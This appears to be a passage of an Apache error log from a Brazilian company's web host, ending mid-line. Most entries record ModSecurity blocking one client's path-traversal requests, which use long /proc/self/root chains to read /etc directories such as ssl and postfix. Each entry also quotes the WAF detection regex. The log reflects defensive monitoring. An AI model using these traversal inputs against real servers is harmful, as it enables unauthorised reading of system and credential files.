[Thu Mar 19 14:07:44.642557 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:41292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtYPu8EFLIOrSqIpvBtQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:07:57.125815 2026] [proxy_fcgi:error] [pid 8307:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:07:59.157519 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:53326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtb8df6f5d65gmYZSTDAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:08:07.510523 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:39872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtdwkwaGbbGflqUZDiKgAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:08:14.828921 2026] [mime_magic:error] [pid 27293:tid 140411624429312] (70014)End of file found: [client 57.141.18.60:56568] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:08:16.490118 2026] [:error] [pid 7032:tid 140411674785536] [client 74.7.243.128:46726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtgHOoiBhmblfxy7FR9wAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:08:25.937466 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:47372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtiRCii7xarUs8iHYBkwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:08:26.125793 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:08:31.689272 2026] [:error] [pid 7545:tid 140411632822016] [client 74.7.243.128:44240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtj38B84UptSoTJtYnLAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:08:52.132511 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:09:10.600984 2026] [core:alert] [pid 26799:tid 140411540502272] [client 74.7.243.128:44246] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 14:09:13.245364 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:36552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtueoXxyEfFpUF8f8l4QAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:15.131546 2026] [proxy_fcgi:error] [pid 7032:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:09:15.463254 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:36566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtuxkFeYa1D6dYQnAK0QAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:19.210008 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:36572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtvxkFeYa1D6dYQnAK2gAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:25.963655 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:39030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwtxfqxLDW4GITHUkSBfQAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:31.242372 2026] [mime_magic:error] [pid 7032:tid 140411557287680] (70014)End of file found: [client 74.7.243.128:44128] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 14:09:31.242487 2026] [access_compat:error] [pid 7032:tid 140411557287680] [client 74.7.243.128:44128] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 14:09:32.558033 2026] [core:alert] [pid 17653:tid 140411708356352] [client 57.141.18.106:58626] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:09:33.549624 2026] [core:alert] [pid 14269:tid 140411666392832] [client 57.141.18.104:58890] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:09:37.120841 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:09:43.967773 2026] [:error] [pid 7545:tid 140411548894976] [client 74.7.243.128:44132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwt138B84UptSoTJtYnWAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:49.089484 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.243.128:33166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwt3f-YZRR_7pZ7nDKkegAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:52.919032 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:44244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwt4BkFeYa1D6dYQnAK9AAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:09:55.796287 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:44256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwt4wkwaGbbGflqUZDiSQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:10:00.178646 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56608] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:10:16.534335 2026] [mime_magic:error] [pid 8307:tid 140411548894976] (70014)End of file found: [client 57.141.18.34:59966] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:10:22.326930 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.243.128:57806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwt_hCii7xarUs8iHYB2QAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:10:23.069221 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57200] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:10:27.337523 2026] [:error] [pid 8307:tid 140411716749056] [client 74.7.243.128:49592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuA7-FhjpZGs9ba8qERgAAAwM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:10:31.563396 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:53076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuB8df6f5d65gmYZSTRAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:10:35.447227 2026] [mime_magic:error] [pid 19093:tid 140411674785536] (70014)End of file found: [client 57.141.18.58:60478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:10:36.037865 2026] [:error] [pid 7545:tid 140411658000128] [client 74.7.243.128:53082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwuDH8B84UptSoTJtYnYgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:10:36.936015 2026] [mime_magic:error] [pid 27293:tid 140411649607424] (70014)End of file found: [client 57.141.18.47:60430] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:10:45.129820 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:10:47.780508 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:53868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 